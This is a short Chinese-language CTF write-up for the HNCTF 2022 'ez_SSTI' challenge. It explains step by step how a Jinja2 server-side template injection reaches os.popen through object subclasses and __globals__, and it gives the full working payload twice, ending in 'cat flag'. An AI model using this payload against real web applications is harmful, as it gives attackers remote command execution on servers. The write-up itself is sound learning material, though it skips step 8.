[HNCTF 2022 WEEK2]ez_SSTI
payload:?name={{''.__class__.__base__.__subclasses__()[137].__init__.__globals__['__builtins__']['eval']('__import__("os").popen("cat flag").read()')}}
1.首先输入{{8*8}}判断漏洞类型
2.然后输入{{''.__class__}}判断当前对象所属的类可以发现为str,因为此处使用的是{{''.__class__}}若使用的是{{''.__class__}}则当前类为tuple
3.再输入{{''.__class__.__base__}}查看当前类对应的父类是否为object
4.输入{{''.__class__.__base__.__subclasses__()}}查看object类的所有子类
5.调用os._wrap_close模块,可以发现此时它的下标为137
6.调用__init__函数,判断模块是否重载
没有出现wrapper字样,所以没有出现重载
7.使用__globals__函数查看全局变量,判断有哪些模块可以调用
可以看到有如下模块可供调用
9.?name={{''.__class__.__base__.__subclasses__()[137].__init__.__globals__['__builtins__']['eval']('__import__("os").popen("cat flag").read()')}}
__builtins__提供对python的所有内置标识符的直接访问
eval()计算字符串表达式的值
popen()执行一个shell以命令来开启一个进程
